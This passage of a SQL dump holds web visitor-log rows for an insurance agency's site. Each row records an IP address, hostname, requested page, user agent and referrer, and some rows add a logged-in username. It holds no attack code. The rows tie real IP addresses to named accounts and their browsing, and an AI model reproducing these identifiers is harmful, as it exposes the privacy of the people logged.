48','us','','','','','','','0','0',0),(3671,'0b_eae71cf7d46f00c97da9b67a754ced86','1457705187','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','','','','','','','0','0',0),(3674,'0b_c7c30cace8679de3e86a47f7d6bbf1d4','1457706074','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(3677,'0b_c7c30cace8679de3e86a47f7d6bbf1d4','1457706077','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(3680,'0b_366ccd51e232703ffc04714d7dc4fcf9','1457706078','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(3683,'0b_366ccd51e232703ffc04714d7dc4fcf9','1457706079','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(3684,'0b_8f6084993042fb4e940b9cb44c11eb7f','1457707390','192.227.204.134','192-227-204-134-host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(3687,'0b_8e70b016bf9ff2d079a3a5479d5f5cfe','1457708426','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3690,'0b_7a6afc3a3ee9974a8efaf70cbd8958a2','1457710046','198.51.212.51','198.51.212.51','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=4&ved=0ahUKEwiX4LP--LjLAhXFdT4KHQGADHoQFgg8MAM&url=http%3A%2F%2Fwww.empireins.com%2Fcase-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target%2F&usg=AFQjCNESXMahUMllOZijJEiTglnulHsYPQ&bvm=bv.116573086,d.cWw','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','0',0),(3692,'0b_7a6afc3a3ee9974a8efaf70cbd8958a2','1457710085','198.51.212.51','198.51.212.51','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','','','0','0',0),(3693,'0b_52e442c94058a4d9190cae3a62633b9d','1457710379','79.143.180.15','mail.ruddog.eu','/robots.txt','Wget/1.13.4 (linux-gnu)','','',0,'','Wget 1','eu','','','Wget','','','','0','0',0),(3696,'0b_0e2c8e6e5aae7bb9728eb4523532849d','1457711691','50.118.136.148','50.118.136.148','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3698,'0b_a3c8efbdb67156b2618b220fd887488d','1457711695','192.171.233.35','192.171.233.35','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3699,'0b_0aa73f596f0e2fb5801cc40546dabc88','1457711705','192.171.240.45','192.171.240.45.rdns.micfo.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3701,'0b_ac553509a62f88a008b552691cbcc9eb','1457711836','192.171.238.120','192.171.238.120','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3702,'0b_8a82b047c24fe5339626dc33b528c3db','1457711846','192.171.244.95','192.171.244.95','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3705,'0b_697787f1afd4c3b870ad81e71921decc','1457711856','23.27.255.164','23.27.255.164','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3707,'0b_7c9ef76729d75f56607636efeab5eba1','1457711885','50.118.160.151','50.118.160.151','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','us','','','','','','','0','0',0),(3708,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712291','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3710,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712293','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3711,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712295','184.154.36.163','scan21.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3713,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712301','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3716,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712303','184.154.36.163','scan21.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3717,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712305','184.154.36.163','scan21.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3720,'0b_dda04c0bd18de692c0c2247110ee3230','1457712309','184.154.36.163','scan21.sitelock.com','/?p=288','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(3723,'0b_7c97f64963bcecc6650d73844bcf18bb','1457712310','184.154.36.163','scan21.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3726,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457712444','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(3729,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457712454','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(3732,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457712467','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(3734,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457712483','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(3735,'0b_4d79e593374fcbb21df51e1b54a3fcd0','1457713878','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3738,'0b_0de0361aaff0b3ac76ddd072dbf7231b','1457714932','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(3740,'0b_a43e313298abcb83eb65c2def35c658f','1457714938','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','0',0),(3743,'0b_a43e313298abcb83eb65c2def35c658f','1457714956','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3744,'0b_a43e313298abcb83eb65c2def35c658f','1457715086','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3746,'0b_a43e313298abcb83eb65c2def35c658f','1457715091','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3747,'0b_a43e313298abcb83eb65c2def35c658f','1457715159','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3749,'0b_a43e313298abcb83eb65c2def35c658f','1457715163','75.99.37.250','ool-4b6325fa.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3750,'0b_a43e313298abcb83eb65c2def35c658f','1457715167','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/case-status/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3752,'0b_a43e313298abcb83eb65c2def35c658f','1457715171','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3753,'0b_a43e313298abcb83eb65c2def35c658f','1457715171','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','0',0),(3756,'0b_a43e313298abcb83eb65c2def35c658f','1457715177','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(3758,'0b_c0d3035200675482344a224487f86f60','1457718609','66.249.75.95','crawl-66-249-75-95.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3761,'0b_c0d3035200675482344a224487f86f60','1457718650','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3762,'0b_bd720b651aca25ec969e65b970a4db7a','1457718651','66.249.75.103','crawl-66-249-75-103.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3764,'0b_bd720b651aca25ec969e65b970a4db7a','1457718667','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3765,'0b_eeaef469d01b33addc92d6f587d2bad4','1457723791','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3768,'0b_1d245314b59106a5f6bbd46283aef8d9','1457724236','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3771,'0b_af88d60caf8138a7ef075bdfd8d4db2f','1457724514','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3773,'0b_43a58bfeeae87442915f70bca5fa824b','1457724621','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3774,'0b_43a58bfeeae87442915f70bca5fa824b','1457724656','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3776,'0b_685ae028a094a21f27325d85b67b276d','1457726876','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(3779,'0b_3699bdabf431c3b85e8d3c772338e2c9','1457727374','141.8.143.175','spider-141-8-143-175.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(3780,'0b_d87e6edaff8ce576d8318ac4c223f0d4','1457730154','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3783,'0b_47dab8ded450dd4110b2e299c62bf8dd','1457734261','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(3786,'0b_47dab8ded450dd4110b2e299c62bf8dd','1457734261','178.255.215.70','crawl06.exabot.com','/products.html','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(3789,'0b_cd6175a6330827b3e3d1b3c40ef67f46','1457734794','173.70.93.193','pool-173-70-93-193.nwrknj.fios.verizon.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','','',0,'WinNT 4.0','IE 5','us','','','','','','','0','0',0),(3791,'0b_cd6175a6330827b3e3d1b3c40ef67f46','1457734796','173.70.93.193','pool-173-70-93-193.nwrknj.fios.verizon.net','/contact/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','','',0,'WinNT 4.0','IE 5','us','','','','','','','0','0',0),(3792,'0b_cd6175a6330827b3e3d1b3c40ef67f46','1457734797','173.70.93.193','pool-173-70-93-193.nwrknj.fios.verizon.net','/about-us/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)','','',0,'WinNT 4.0','IE 5','us','','','','','','','0','0',0),(3794,'0b_766de04c64e008f26f936b0032c71ed5','1457736108','52.37.177.28','ec2-52-37-177-28.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3797,'0b_766de04c64e008f26f936b0032c71ed5','1457736108','52.37.177.28','ec2-52-37-177-28.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3798,'0b_766de04c64e008f26f936b0032c71ed5','1457736113','52.37.177.28','ec2-52-37-177-28.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3800,'0b_766de04c64e008f26f936b0032c71ed5','1457736166','52.37.177.28','ec2-52-37-177-28.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3803,'0b_766de04c64e008f26f936b0032c71ed5','1457736166','52.37.177.28','ec2-52-37-177-28.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3806,'0b_55e7d8f6b701170e6ed3a8c59ab41619','1457736390','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3809,'0b_3452083a4da5b2dc98d64758e8b8388e','1457736396','151.80.31.143','boson131.ahrefs.com','/robots.txt','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3812,'0b_e544509c126cbf76f621ffc8fde43c42','1457743712','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3815,'0b_d625f26f7b5aedc1a2c1e4b285ee50ed','1457747474','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3816,'0b_14f3fdffd83dd59e653a6bf5b3df7276','1457749509','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3818,'0b_09f2d97354d01746f8c565a0310d3819','1457753582','54.204.254.241','ec2-54-204-254-241.compute-1.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(3819,'0b_09f2d97354d01746f8c565a0310d3819','1457753582','54.204.254.241','ec2-54-204-254-241.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(3821,'0b_c7147f5bf02e9410878465ef57d3f9c8','1457756496','188.240.88.21','static21.mediasecure.org','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 34','us','','','','','','','0','0',0),(3822,'0b_5022c05f67aa617b9852ab7225d740f5','1457757171','220.181.108.106','baiduspider-220-181-108-106.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(3824,'0b_6295cc35fe7334cb138fa6dd137a9a62','1457757170','111.13.102.132','111.13.102.132','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(3825,'0b_e240f3655fc82d92116392cb4b6ae4de','1457757296','123.125.71.113','baiduspider-123-125-71-113.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(3828,'0b_de7090d2437c4867c166d5721173cffa','1457757754','54.205.18.70','ec2-54-205-18-70.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)','','',0,'','','','','','linkdexbot','','','','0','0',0),(3831,'0b_43fda99b4091366dd6151feccba5534d','1457757755','107.77.100.61','107.77.100.61','/','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','','',0,'Android 5','SamsungBrowser 2','us','','','','','','','0','0',0),(3834,'0b_43fda99b4091366dd6151feccba5534d','1457757818','107.77.100.61','107.77.100.61','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 2','us','','','','','','','0','0',0),(3836,'0b_fb04598ee8a6480f5e50112a7a8ace6b','1457758190','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3837,'0b_e602e4bf617e367f93389d385d334596','1457758521','66.249.75.103','crawl-66-249-75-103.googlebot.com','/forms/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3839,'0b_81c21b856794db561c5a820dc7a42746','1457761525','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3842,'0b_81c21b856794db561c5a820dc7a42746','1457761531','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3845,'0b_81c21b856794db561c5a820dc7a42746','1457761573','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3848,'0b_a70a614bef6f0eca247c938e55f8e881','1457763924','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3851,'0b_a70a614bef6f0eca247c938e55f8e881','1457763928','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3854,'0b_18127c12e67f75aa10ffe0ad445c7dd5','1457765280','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3857,'0b_18127c12e67f75aa10ffe0ad445c7dd5','1457765301','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3860,'0b_66b26d48987b649d1bdc5c310283c91f','1457765319','195.154.8.111','torrelay1.tomhek.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://hundejo.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(3861,'0b_1a29c8c81749f51b3e5db3e6fc04ceec','1457765321','85.248.227.163','ori.enn.lu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://hundejo.com/','',0,'Linux','Chrome 37','lu','','','','','','','2','0',0),(3863,'0b_18127c12e67f75aa10ffe0ad445c7dd5','1457765336','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3866,'0b_18127c12e67f75aa10ffe0ad445c7dd5','1457765337','52.24.112.251','ec2-52-24-112-251.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3867,'0b_8365d875bf603f89d83c76b6401c6cb5','1457765565','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3870,'0b_8ab2111157b29b3b9f73ae4213b56c59','1457765957','180.76.15.14','baiduspider-180-76-15-14.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(3873,'0b_788b453e8f65d534af79079c3e6059c3','1457766307','199.21.99.194','spider-199-21-99-194.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(3876,'0b_a395fe07363996f1e6f24b2d867ba800','1457766311','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; 